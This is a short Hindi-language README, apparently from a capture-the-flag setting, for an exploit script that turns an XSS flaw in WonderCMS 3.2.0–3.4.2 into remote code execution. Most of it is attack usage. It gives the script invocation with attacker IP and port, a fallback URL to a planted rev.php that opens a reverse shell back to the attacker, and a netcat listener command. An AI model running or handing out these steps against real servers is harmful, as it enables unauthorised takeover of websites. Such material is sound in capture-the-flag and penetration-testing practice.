
Xss इंजेक्शन, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 असुरक्षित है। दूरस्थ हमलावर क्रॉस-साइट स्क्रिप्टिंग (XSS) शोषण का उपयोग करके सर्वर का पूर्ण नियंत्रण प्राप्त कर सकते हैं (केवल शैक्षिक उद्देश्यों के लिए )। यहाँ खेल की योजना है:
शोषण WonderCMS के installModule घटक का दुरुपयोग करके एक तैयार स्क्रिप्ट को चुपके से डालता है जो मनमाना कोड चलाता है।
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
उदाहरण
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
यदि रिवर्स शेल स्वचालित रूप से ट्रिगर नहीं होता है, तो बस यहाँ जाएँ:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
निम्नलिखित कमांड का उपयोग करके एक श्रोता प्रारंभ करना याद रखें:
nc -lvp 4444
prodigiousMind द्वारा कमजोरी की खोज और रिपोर्ट करने के लिए https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413